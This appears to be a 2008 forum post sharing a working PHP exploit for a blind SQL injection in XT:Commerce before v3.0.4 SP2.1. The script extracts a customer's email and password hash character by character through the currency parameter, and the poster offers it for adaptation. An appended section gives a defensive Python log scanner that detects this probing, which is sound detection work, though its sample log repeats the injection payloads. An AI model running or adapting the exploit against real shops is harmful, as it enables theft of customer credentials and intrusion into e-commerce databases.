This exploit was nonpub ... the vulnerability was only discovered very late by XT Commerce,
and so far I don't know of any exploit that has gone public. So mine is basically still nonpub...
The code is not preview code ...
greez ins0
PHP
#!/usr/bin/php -q
<?php
/*************************************************************************
 * XT:Commerce < v3.0.4 SP2.1 Currency.Class SQL Injection Vulnerability *
 * 2008 //ins0.! - 0-day development                                     *
 *************************************************************************/
$alpha_low = array('.', '@', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
                   'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z');
$numbers = array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9');
$correct_chars = '';
$md5_string = '';
for($x = 0; $x < count($alpha_low); $x++){
    $char_string = $correct_chars.ord($alpha_low[$x]).',';
    $query_string = "http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(".$char_string."37))/*&manufacturers_id='";
    $source = file_get_contents($query_string);
    if(preg_match('#EUR#iU', $source) == 0){
        $correct_chars .= ord($alpha_low[$x]).',';
        $md5_string .= $alpha_low[$x];
        echo ">>>>> FOUND -> '".$alpha_low[$x]."' MD5 = ".$md5_string."\r\n\r\n\r\n";
        $x = -1;
        continue;
    }else{
        echo '\''.$alpha_low[$x].'\' => '.preg_match('#EUR#iU', $source)."\r\n";
    }
    if($x == 27){
        for($y = 0; $y < count($numbers); $y++){
            $char_string = $correct_chars.ord($numbers[$y]).',';
            $query_string = "http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_password+LIKE+CHAR(".$char_string."37))/*&manufacturers_id='&date=".time();
            $source = file_get_contents($query_string);
            if(preg_match('#EUR#iU', $source) == 0){
                $correct_chars .= ord($numbers[$y]).',';
                $md5_string .= $numbers[$y];
                echo ">>>>> FOUND -> '".$numbers[$y]."' MD5 = ".$md5_string."\r\n\r\n\r\n";
                $y = 15;
            }else{
                echo '\''.$numbers[$y].'\' => '.preg_match('#EUR#iU', $source)."\r\n";
            }
        }
        $x = -1;
    }
}
echo "\r\n\r\n\r\n";
echo ">>>> Break! MD5: => ".$md5_string."\r\n";
?>
The code is functional and suitable for password + email, but it has to be adapted.
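Added example, not part of the original post and not XT:Commerce code: the extraction above sends one request per candidate character and reads a yes/no answer from whether "EUR" appears in the response, so a run against a shop leaves a very recognisable trail in the web server's access log. The Python script below parses Apache-style log lines, URL-decodes each query parameter, flags values carrying boolean-based blind injection indicators (a quote followed by OR, SELECT ... FROM, CHAR(...) encoded literals, an IF(...) branch, a trailing comment), and then groups flagged requests by client IP and parameter name, because the character-by-character probing produces a burst of near-identical requests that a single-request signature would under-report. The log lines, client IPs and the burst threshold are constructed assumptions for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (TEST-NET addresses); the first three
# mirror the probing pattern of the script above, the last two are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:10:15:01 +0100] "GET /?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(46,37))/*&manufacturers_id=' HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2008:10:15:02 +0100] "GET /?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(64,37))/*&manufacturers_id=' HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2008:10:15:03 +0100] "GET /?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(97,37))/*&manufacturers_id=' HTTP/1.1" 200 5120
198.51.100.20 - - [12/Mar/2008:10:15:04 +0100] "GET /?currency=EUR&manufacturers_id=3 HTTP/1.1" 200 5120
198.51.100.20 - - [12/Mar/2008:10:16:10 +0100] "GET /product_info.php?products_id=12&currency=USD HTTP/1.1" 200 8000
"""

# Apache combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of boolean-based blind SQL injection in a decoded parameter value.
# Each one alone is weak; several together on one value is a strong signal.
SQLI_PATTERNS = [
    ("quote-or", re.compile(r"'\s*or\s+", re.I)),            # break out of a string literal
    ("select-from", re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)),
    ("char-literal", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.I)),
    ("if-branch", re.compile(r"\bif\s*\(", re.I)),           # the true/false oracle
    ("comment-tail", re.compile(r"/\*")),                     # swallow the rest of the query
]


def parse_line(line):
    """Parse one access-log line into a dict with decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs decodes percent-escapes and turns '+' into spaces, so the
    # indicators are matched against what the application actually received.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def sqli_indicators(value):
    """Return the names of all indicators that match a decoded parameter value."""
    return [name for name, rx in SQLI_PATTERNS if rx.search(value)]


def scan_log(text):
    """Scan log text and return one finding per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                hits = sqli_indicators(value)
                if hits:
                    findings.append({"ip": rec["ip"], "ts": rec["ts"],
                                     "path": rec["path"], "param": name,
                                     "indicators": hits})
    return findings


def extraction_bursts(findings, threshold=3):
    """Group findings by (ip, parameter) and keep groups at or above threshold.

    Character-by-character extraction needs one request per guess, so a client
    hammering the same parameter with injection payloads stands out even when
    each individual request would be dismissed as noise."""
    counts = defaultdict(int)
    for f in findings:
        counts[(f["ip"], f["param"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['path']} param={f['param']} -> {', '.join(f['indicators'])}")
    for (ip, param), n in extraction_bursts(found).items():
        print(f"possible blind extraction: {ip} probed '{param}' {n} times")
```

Running it on the constructed sample prints three flagged requests, each matching all five indicators on the `currency` parameter, and one burst entry for the probing client; the two ordinary requests produce nothing. In a real deployment the same logic would sit behind a log shipper or WAF rule, and the burst grouping is what distinguishes an extraction run from a single scanner probe.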